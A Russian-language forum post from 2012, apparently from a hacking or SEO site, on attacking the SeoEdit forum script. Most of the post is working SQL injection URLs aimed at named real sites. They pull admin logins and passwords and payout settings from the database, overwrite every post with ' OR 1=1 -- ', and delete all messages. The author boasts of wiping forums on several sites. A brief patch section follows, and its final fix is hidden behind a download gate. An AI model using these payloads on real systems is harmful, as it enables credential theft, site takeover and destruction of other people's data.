Реклама





РЕКЛАМА

UpgradeHost


недорогая реклама в интернете
ОНЛАЙН НА САЙТЕ
Всего на сайте: 3
Пользователей: 0
Гостей: 3
Бомбим форум в SeoEdit
Автор: Hitman | Дата: 22-07-2012, 11:49 | Комментариев: 0 | Просмотров: 1526
Бомбим форум в SeoEdit

Итак, имеем форум, установлен он на хост, давайте посмотрим, что с ним можно сделать.

Итак, имеем форум, установлен он на хост, давайте посмотрим, что с ним можно сделать.

Что можно сделать:

1. SELECT:
1.1. http://seosprint.info/forum_posts.php?th=0'+union+select+1,2,3,4+--+
1.2. http://seosprint.info/forum_topic.php?gr='+union+select+1,2,3,4,5,6,7,8,9,10+--+
1.3. http://seosprint.info/forum_edit.php?post='+union+select+(SELECT+username+from+tb_users+where+user_status='admin'),2+--+

Выведенную цифру можно спокойно поменять на запрос, поставив его в скобки.

Примеры запросов:
SELECT+username+from+tb_users+where+user_status='admin' - берёт логин админа, username можно поменять на email или password. Что к чему вы разберётесь.

SELECT+price+from+tb_config+where+item='maxautopay' - выведем максимальную сумму для автоматической выплаты.

SELECT+payforad+from+tb_site+where+id=1 - если вывело 1 - значит включена выплата раз в сутки.

SELECT+x2+from+tb_site+where+id=1 - если выводит 1 - значит включены автовыплаты.

Другие запросы можно составить самим.

2. UPDATE:
В этом случае можно сделать массовую замену всех сообщений на форуме на свой текст. Пишем что-нить на форуме -> жмём редактировать -> открываем исходный код и ищем:
<input type="hidden" name="idgroupe" value="123" />

123 - номер вашего поста (ID), меняем в исходном коде его на:
' OR 1=1 -- '

Вводим текст и подтверждаем.
3. DELETE
Я так убил форум на clickid.ru, да и на goldenclic.ru и seosprint.info

Идём по ссылке: http://seosprint.info/forum_posts.php?delete='+or+1=1+--+ (у нас удалились все сообщения на форуме) wink

Фиксимся:

1. Проставим интвалы forum_posts.php:
$adse=($_GET["th"]);
$pagetemp=($_GET["page"]);

Перед скобками проставляем intval, сделать тоже самое во всех файлах форума.

Далее в forum_posts.php:
$id_dell=strip_tags($_GET["delete"]);

strip_tags => intval

Ещё ниже:
$id_post=strip_tags($_POST["idgroupe"]);

Аналогично меняем strip_tags на intval

Теперь открываем каждый файл и меняем оставшиеся strip_tags на limpiar.

И наконец самый главный фикс: ставим вот чтоб наверняка.

Скачивание на максимальной скорости и без рекламы, доступно только для пользователей - зарегистрируйтесь!
Для Гостей, доступно скачивание только через DepositFiles!




Теги: Бомбим форум в SeoEdit

 (голосов: 1)
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.